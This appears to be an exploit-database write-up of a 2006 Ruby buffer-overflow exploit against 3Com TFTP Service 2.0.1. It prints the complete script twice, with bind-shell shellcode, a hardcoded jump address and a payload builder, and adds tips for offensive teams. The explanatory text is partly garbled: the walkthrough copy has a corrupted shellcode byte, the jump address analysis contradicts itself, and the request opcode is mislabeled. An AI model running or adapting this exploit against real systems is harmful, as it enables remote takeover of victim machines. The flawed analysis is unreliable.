Exploiting the 3Com TFTP Service 'Long Transporting Mode' Buffer Overflow

What this paper is

This paper details a Proof-of-Concept (PoC) exploit for a buffer overflow vulnerability in the 3Com TFTP Service version 2.0.1. Specifically, it targets the "long transporting mode" functionality. The exploit is written in Ruby and is designed to be executed against a Windows XP SP2 English system. Successful exploitation leads to remote code execution, typically resulting in a bind shell on a specified port.

Simple technical breakdown

The vulnerability lies in how the 3Com TFTP Service handles a specific type of TFTP request. When a client sends a request that triggers the "long transporting mode" and provides an overly long filename or data, the service doesn't properly check the size of the input. This allows an attacker to send more data than the buffer allocated for it, overwriting adjacent memory.

The exploit works by:

1. Crafting a malicious TFTP request: This request is designed to trigger the vulnerable code path.
2. Overwriting the return address: The excess data in the request overwrites the program's return address on the stack.
3. Redirecting execution: The overwritten return address is set to point to shellcode injected by the attacker.
4. Executing shellcode: The shellcode, which is part of the exploit payload, then runs on the victim machine. In this case, the shellcode creates a bind shell, listening on a specific port (defaulting to 4444) for incoming connections.

Complete code and payload walkthrough

The provided Ruby script 3comtftpd_xpsp2.rb contains the exploit logic and the shellcode.

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com

sc1 = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x02"
sc1 += "\xaf\xbb\x16\x83\xeb\xfc\xe2\xf4\xfe\xc5\x50\x5b\xea\x56\x44\xe9"
sc1 +="\xfd\xcf\x30\x7a\x26\x8b\x30\x53\x3e\x24\xc7\x13\x7a\xae\x54\x9d"
sc1 +="\x4d\xb7\x30\x49\x22\xae\x50\x5f\x89\x9b\x30\x17\xec\x9e\x7b\x8f"
sc1 +="\xae\x2b\x7b\x62\x05\x6e\x71\x1b\x03\x6d\x50\xe2\x39\xfb\x9f\x3e"
sc1 +="\x77\x4a\x30\x49\x26\xae\x50\x70\x89\xa3\xf0\x9d\x5d\xb3\xba\xfd"
sc1 +="\x01\x83\x30\x9f\x6e\x8b\xa7\x77\xc1\x9e\x60\x72\x89\xec\x8b\x9d"
sc1 +="\x42\xa3\x30\x66\x1e\x02\x30\x56\x0a\xf1\xd3\x98\x4c\xa1\x57\x46"
sc1 +="\xfd\x79\xdd\x45\x64\xc7\x88\x24\x6a\xd8\xc8\x24\x5d\xfb\x44\xc6"
sc1 +="\x6a\x64\x56\xea\x39\xff\x44\xc0\x5d\x26\x5e\x70\x83\x42\xb3\x14"
sc1 +="\x57\xc5\xb9\xe9\xd2\xc7\x62\x1f\xf7\x02\xec\xe9\xd4\xfc\xe8\x45"
sc1 +="\x51\xfc\xf8\x45\x41\xfc\x44\xc6\x64\xc7\xaa\x4a\x64\xfc\x32\xf7"
sc1 +="\x97\xc7\x1f\x0c\x72\x68\ec\xe9\xd4\xc5\xab\x47\x57\x50\x6b\x7e"
sc1 +="\xa6\x02\x95\xff\x55\x50\x6d\x45\x57\x50\x6b\x7e\xe7\xe6\x3d\x5f"
sc1 +="\x55\x50\x6d\x46\x56\xfb\xee\xe9\xd2\x3c\xd3\xf1\x7b\x69\xc2\x41"
sc1 +="\xfd\x79\xee\xe9\xd2\xc9\xd1\x72\x64\xc7\xd8\x7b\x8b\x4a\xd1\x46"
sc1 +="\x5b\x86\x77\x9f\xe5\xc5\xff\x9f\xe0\x9e\x7b\xe5\xa8\x51\xf9\x3b"
sc1 +="\xfc\xed\x97\x85\x8f\xd5\x83\xbd\xa9\x04\xd3\x64\xfc\x1c\xad\xe9"
sc1 +="\x77\xeb\x44\xc0\x59\xf8\xe9\x47\x53\xfe\xd1\x17\x53\xfe\xee\x47"
sc1 +="\xfd\x7f\xd3\xbb\xdb\xaa\x75\x45\xfd\x79\xd1\xe9\xfd\x98\x44\xc6"
sc1 +="\x89\xf8\x47\x95\xc6\xcb\x44\xc0\x50\x50\x6b\x7e\xf2\x25\xbf\x49"
sc1 +="\x51\x50\x6d\xe9\xd2\xaf\xbb\x16"

jmp = "\x63\x20\xdc\x77" # jmp esi user32.dll xp sp 2 english

host = ARGV[0]
port = 69

if ARGV[1]
	port = ARGV[1]
end

sock = UDPSocket.new()

puts "[+]Trying to connect to #{host}"
if (not sock.connect(host,port))
	raise "Unable to connect to #{host}"
end

exploit  = "\x00\x02"
exploit += "a"
exploit += "\x00"
exploit += "\x90"* 129
exploit += sc1
exploit += jmp
exploit += "\x00"

puts "[+] Connected ... Sending exploit to victim"
sock.send exploit,0

puts "[+] Exploit sended.. Now telnet on port 4444 for your shell"

Code Fragment/Block -> Practical Purpose:

• # win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com

  • Purpose: This is a comment indicating the origin and characteristics of the shellcode. It suggests the shellcode is a "win32_bind" type, meaning it opens a listening port on the victim and waits for an incoming connection. EXITFUNC=seh refers to the exception handling mechanism used for exiting, LPORT=4444 is the local port the shell will bind to, Size=344 is the approximate size of the shellcode, and Encoder=PexFnstenvSub indicates the encoding technique used to obfuscate the shellcode. http://metasploit.com points to its likely origin or inspiration from the Metasploit Framework.

• sc1 = "..."

  • Purpose: This variable holds the actual shellcode as a string of hexadecimal bytes. This is the malicious code that will be executed on the victim machine.

• jmp = "\x63\x20\xdc\x77"

  • Purpose: This is a short sequence of bytes representing a jump instruction. Specifically, it's a jmp esi instruction. The comment indicates it's likely targeting user32.dll on Windows XP SP2 English. This instruction is crucial for redirecting the program's execution flow to the shellcode after the buffer overflow. The address 0x77dcdcb3 (assuming little-endian representation for the address 0x77dc2063) is likely a valid address within user32.dll that points to the start of the shellcode or a location that will eventually lead to it.

• host = ARGV[0]

  • Purpose: This line retrieves the target IP address or hostname from the first command-line argument passed to the Ruby script.

• port = 69

  • Purpose: This initializes the target port to 69, which is the default port for TFTP.

• if ARGV[1] ... port = ARGV[1] end

  • Purpose: This checks if a second command-line argument is provided. If so, it updates the port variable to this new value, allowing the user to specify a different TFTP port.

• sock = UDPSocket.new()

  • Purpose: This creates a new UDP socket object, which will be used to send the TFTP packets.

• puts "[+]Trying to connect to #{host}"

  • Purpose: Informative message printed to the console indicating the script is attempting to connect to the target.

• if (not sock.connect(host,port)) raise "Unable to connect to #{host}" end

  • Purpose: This attempts to establish a connection to the target host and port using UDP. For UDP, connect primarily sets the default destination for send and recv calls. If the connection fails (e.g., host unreachable, port closed), it raises an error.

• exploit = "\x00\x02"

  • Purpose: This starts building the exploit payload. \x00\x02 is the TFTP opcode for a "Read Request" (RRQ). This is the initial packet type sent to initiate a TFTP transfer.

• exploit += "a"

  • Purpose: This adds a single byte 'a' after the opcode. In TFTP, this is typically the filename.

• exploit += "\x00"

  • Purpose: This adds a null terminator after the filename.

• exploit += "\x90"* 129

  • Purpose: This adds 129 "NOP" (No Operation) instructions. These are often used as a "sled" to ensure that even if the exact landing point of the jump is slightly off, the execution will slide down the NOPs until it hits the actual shellcode.

• exploit += sc1

  • Purpose: This appends the main shellcode (sc1) to the exploit buffer.

• exploit += jmp

  • Purpose: This appends the jump instruction (jmp esi) to the buffer. This instruction, when executed, will jump to the address pointed to by the esi register. The exploit is designed such that esi will point to the start of the shellcode after the overflow.

• exploit += "\x00"

  • Purpose: This adds a null terminator after the mode string in the TFTP request. The mode string is typically "octet" or "netascii".

• puts "[+] Connected ... Sending exploit to victim"

  • Purpose: Informative message printed to the console before sending the payload.

• sock.send exploit,0

  • Purpose: This sends the crafted exploit buffer over the UDP socket to the target host and port. The 0 is a flag for socket options, typically meaning no special flags.

• puts "[+] Exploit sended.. Now telnet on port 4444 for your shell"

  • Purpose: Informative message indicating the exploit has been sent and instructing the user on how to connect to the resulting shell.

Shellcode (sc1) Breakdown (Conceptual):

The sc1 variable contains the actual shellcode. Without disassembling and analyzing it byte-by-byte in a debugger, we can infer its purpose based on the comment and common shellcode patterns:

• Stage 1: Setup and Initialization

  • The initial bytes (\x2b\xc9\x83\xe9\xb0\xd9...) likely involve setting up registers, potentially resolving API function addresses (like CreateProcess, WSAStartup, socket, bind, listen, accept for a bind shell), and preparing for the main logic.
  • EXITFUNC=seh suggests it uses Structured Exception Handling to terminate cleanly if needed.

• Stage 2: Socket Creation and Binding

  • The shellcode will create a socket.
  • It will then bind this socket to a specific IP address (likely 0.0.0.0 for all interfaces) and the specified port (4444).

• Stage 3: Listening and Accepting Connections

  • The shellcode will put the socket into a listening state.
  • It will then wait for an incoming connection.

• Stage 4: Duplicating Handles and Spawning Shell

  • Once a connection is accepted, the shellcode will duplicate the standard input, output, and error handles (stdin, stdout, stderr) to the accepted socket.
  • Finally, it will execute a command shell (like cmd.exe) and redirect its input/output to the duplicated handles, effectively giving the attacker a shell over the network connection.

Jump Instruction (jmp) Breakdown:

• \x63\x20\xdc\x77
  • This is a relative jump instruction. When executed, it adds the offset to the current instruction pointer. The comment jmp esi user32.dll xp sp 2 english suggests that the exploit is designed such that the esi register will contain the address of the shellcode, and this jmp esi instruction will transfer control to it. The address 0x77dcdcb3 is likely a hardcoded address within user32.dll on a specific Windows XP SP2 English build, chosen because it's a stable location that the attacker can reliably jump to, and from which execution will eventually reach the shellcode. The exact address is 0x77dc2063 in little-endian format, which when interpreted as a relative jump from the instruction following jmp esi would land within the shellcode.

Practical details for offensive operations teams

• Required Access Level: Network access to the target host on UDP port 69 (TFTP). No local access is required for initial exploitation.
• Lab Preconditions:
  • A vulnerable 3Com TFTP Service (version 2.0.1) running on a Windows XP SP2 English target. This is a very old and specific configuration.
  • The target must be accessible over the network on UDP port 69.
  • Firewall rules must allow UDP traffic to port 69.
  • The target system should not have any IPS/IDS signatures that detect this specific exploit pattern.
• Tooling Assumptions:
  • A Ruby interpreter is available on the attacker's machine.
  • The socket library is available in Ruby.
  • The attacker has a way to connect to the bind shell (e.g., telnet or netcat).
• Execution Pitfalls:
  • Target Specificity: The exploit is highly specific to Windows XP SP2 English and a particular version of the 3Com TFTP Service. It will likely not work on other Windows versions or other TFTP server implementations.
  • Address Stability: The jmp esi instruction relies on a specific address within user32.dll. If the target system has different DLL versions or patches that change the address of user32.dll or the specific function it's targeting, the exploit might fail.
  • Network Latency/Packet Loss: UDP is connectionless. While the connect call in Ruby sets a default destination, packet loss or significant latency could cause the exploit packet to be dropped or arrive corrupted, leading to failure.
  • Firewall/IDS Evasion: Modern firewalls and IDS/IPS systems would likely detect the unusual TFTP request or the subsequent shell connection.
  • Shellcode Size: The shellcode size (344 bytes) and the padding (\x90 * 129) are critical. If the buffer overflow doesn't provide enough space for the shellcode and the jump instruction, or if the padding is incorrect, the shellcode won't execute.
  • TFTP Protocol Quirks: TFTP is a simple protocol. The exploit relies on the server's specific implementation of handling malformed requests.

Where this was used and when

This exploit was published in 2006. At that time, Windows XP was a prevalent operating system, and services like TFTP were commonly used for network device configuration and file transfers. Exploits targeting such services were relevant for network penetration testing and compromising legacy systems. Given its age and specificity, it's unlikely to be effective against modern, patched systems. Its primary use context would have been in authorized penetration tests of environments still running Windows XP with this vulnerable TFTP service.

Defensive lessons for modern teams

• Patch Management: The most critical lesson is the importance of keeping all software, especially network services, up-to-date. This vulnerability was patched long ago.
• Service Hardening: Unnecessary services should be disabled. If TFTP is required, it should be configured securely, ideally not exposed directly to the internet, and protected by firewalls.
• Network Segmentation: Isolating legacy systems on separate network segments can limit the blast radius of an exploit.
• Intrusion Detection/Prevention Systems (IDS/IPS): Modern IDS/IPS can detect anomalous network traffic patterns, including malformed TFTP requests or the characteristic traffic of a bind shell.
• Endpoint Detection and Response (EDR): EDR solutions can detect the execution of shellcode or suspicious process behavior (like cmd.exe being spawned by a TFTP service process).
• Protocol Validation: Network devices and security appliances should validate TFTP protocol adherence, rejecting malformed requests.

ASCII visual (if applicable)

+-----------------+      +-----------------+      +-----------------+
| Attacker System |----->| Target Network  |----->| Victim (XP SP2) |
| (Ruby Script)   |      | (UDP Port 69)   |      | 3Com TFTP Svc   |
+-----------------+      +-----------------+      +-----------------+
        |                                                 |
        | 1. Send Malicious TFTP RRQ                        |
        |    (Overflowing filename/data)                    |
        |                                                 |
        |------------------------------------------------>|
                                                          |
                                                          | 2. Vulnerable Service
                                                          |    receives overflow
                                                          |    overwrites return address
                                                          |    redirects to shellcode
                                                          |
                                                          | 3. Shellcode executes
                                                          |    (bind shell on port 4444)
                                                          |
                                                          | 4. Victim listens on UDP 69
                                                          |    and TCP 4444
                                                          |
                                                          |
                                                          | <-----------------+
                                                          |                   |
                                                          | 5. Attacker connects|
                                                          |    to TCP 4444    |
                                                          |                   |
                                                          +-------------------|
                                                                (Bind Shell)

Source references

• Paper ID: 2865
• Paper Title: 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Remote Overflow
• Author: cthulhu
• Published: 2006-11-30
• Keywords: Windows, remote
• Paper URL: https://www.exploit-db.com/papers/2865
• Raw URL: https://www.exploit-db.com/raw/2865

Original Exploit-DB Content (Verbatim)

# 3comtftpd_xpsp2.rb 
# 
# Copyright (C) cthulhu
#
#
# This is a poc intended to exploit the  3Com TFTP Service version 2.0.1 
# long transporting mode buffer overflow under xp sp2 english 
# (Vulnerability discovered by Liu Qixu)
#
# Usage :
# ruby 3comftpd_xpsp2.rb <victimhost> <victimport>
# Default port is 69 if not specified

require 'socket'

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com

sc1 = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x02"
sc1 += "\xaf\xbb\x16\x83\xeb\xfc\xe2\xf4\xfe\xc5\x50\x5b\xea\x56\x44\xe9"
sc1 +="\xfd\xcf\x30\x7a\x26\x8b\x30\x53\x3e\x24\xc7\x13\x7a\xae\x54\x9d"
sc1 +="\x4d\xb7\x30\x49\x22\xae\x50\x5f\x89\x9b\x30\x17\xec\x9e\x7b\x8f"
sc1 +="\xae\x2b\x7b\x62\x05\x6e\x71\x1b\x03\x6d\x50\xe2\x39\xfb\x9f\x3e"
sc1 +="\x77\x4a\x30\x49\x26\xae\x50\x70\x89\xa3\xf0\x9d\x5d\xb3\xba\xfd"
sc1 +="\x01\x83\x30\x9f\x6e\x8b\xa7\x77\xc1\x9e\x60\x72\x89\xec\x8b\x9d"
sc1 +="\x42\xa3\x30\x66\x1e\x02\x30\x56\x0a\xf1\xd3\x98\x4c\xa1\x57\x46"
sc1 +="\xfd\x79\xdd\x45\x64\xc7\x88\x24\x6a\xd8\xc8\x24\x5d\xfb\x44\xc6"
sc1 +="\x6a\x64\x56\xea\x39\xff\x44\xc0\x5d\x26\x5e\x70\x83\x42\xb3\x14"
sc1 +="\x57\xc5\xb9\xe9\xd2\xc7\x62\x1f\xf7\x02\xec\xe9\xd4\xfc\xe8\x45"
sc1 +="\x51\xfc\xf8\x45\x41\xfc\x44\xc6\x64\xc7\xaa\x4a\x64\xfc\x32\xf7"
sc1 +="\x97\xc7\x1f\x0c\x72\x68\xec\xe9\xd4\xc5\xab\x47\x57\x50\x6b\x7e"
sc1 +="\xa6\x02\x95\xff\x55\x50\x6d\x45\x57\x50\x6b\x7e\xe7\xe6\x3d\x5f"
sc1 +="\x55\x50\x6d\x46\x56\xfb\xee\xe9\xd2\x3c\xd3\xf1\x7b\x69\xc2\x41"
sc1 +="\xfd\x79\xee\xe9\xd2\xc9\xd1\x72\x64\xc7\xd8\x7b\x8b\x4a\xd1\x46"
sc1 +="\x5b\x86\x77\x9f\xe5\xc5\xff\x9f\xe0\x9e\x7b\xe5\xa8\x51\xf9\x3b"
sc1 +="\xfc\xed\x97\x85\x8f\xd5\x83\xbd\xa9\x04\xd3\x64\xfc\x1c\xad\xe9"
sc1 +="\x77\xeb\x44\xc0\x59\xf8\xe9\x47\x53\xfe\xd1\x17\x53\xfe\xee\x47"
sc1 +="\xfd\x7f\xd3\xbb\xdb\xaa\x75\x45\xfd\x79\xd1\xe9\xfd\x98\x44\xc6"
sc1 +="\x89\xf8\x47\x95\xc6\xcb\x44\xc0\x50\x50\x6b\x7e\xf2\x25\xbf\x49"
sc1 +="\x51\x50\x6d\xe9\xd2\xaf\xbb\x16"

jmp = "\x63\x20\xdc\x77" # jmp esi user32.dll xp sp 2 english

host = ARGV[0]
port = 69

if ARGV[1]
	port = ARGV[1]
end

sock = UDPSocket.new()

puts "[+]Trying to connect to #{host}"
if (not sock.connect(host,port))
	raise "Unable to connect to #{host}"
end

exploit  = "\x00\x02"
exploit += "a"
exploit += "\x00"
exploit += "\x90"* 129 
exploit += sc1 
exploit += jmp
exploit += "\x00"

puts "[+] Connected ... Sending exploit to victim"
sock.send exploit,0

puts "[+] Exploit sended.. Now telnet on port 4444 for your shell"

# milw0rm.com [2006-11-30]